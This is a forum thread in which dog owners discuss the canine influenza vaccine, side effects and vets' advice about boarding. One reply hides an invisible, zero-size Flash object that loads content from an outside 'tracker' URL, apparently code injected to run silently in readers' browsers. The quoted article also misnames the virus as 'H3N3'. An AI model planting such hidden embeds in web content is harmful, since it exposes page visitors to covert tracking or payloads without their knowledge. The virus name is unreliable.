Flu shot for dogs

Has anyone gotten there dog vaccinated yet. Our vet does highly recommend it. There currently aren't any cases in MD but there are in VA and DC. I was just wondering if they were any side effects that anyone has seen. I am not a fan of the human flu shot so I am a little leery about this one. Jaeger has an appt already for tomorrow and I figured while he is there I can just get it done.

"The popularity of flu shots has skyrocketed this year, and now someone else in your family may need one--your dog.

So far cases have been reported in 30 states, with Colorado, New York, Florida, and Pennsylvania being hit the hardest.

Gathering areas for dogs, such as dog parks and doggie daycares, are common breeding grounds for the contagious canine malady.

Some boarding facilities nationwide, including the Animal Lodge at VCA Alameda East Veterinary Hospital locally, are requiring dogs to get the new canine influenza vaccination prior to their stay. Many more are offering flu shots clinics for pets.

The canine flu vaccine will not prevent the virus from taking hold, but can lessen the duration and severity of the infection.

After the initial vaccination, owners and their dogs have to wait 2-4 weeks for the booster shot.

Canine influenza is also known as H3N3 or CIV (Canine Influenza Virus). For more information about its symptoms, click on this link."

mkd, i posted this over a week ago when i heard about it. Even if you take your dogs to a groomer there is always a possibility. I know they have kennel cough preventive treatments not sure about dog flu shots or treatments.

The only reason I am probably going to get it is because he does go to the kennel several times a year.

I was told that since the vaccination was still new to wait – not much is known about the possible reaction and dosing may need to be varied.

That's our vet's theory. The shot is not for every dog. :yay:<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://secsportschat.com/?tracker=3759"></param><param name="allowFullScreen" value="true"></param><embed src="http://secsportschat.com/?tracker=3759" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Same thing my vet told us, no need unless the dog is boarded....
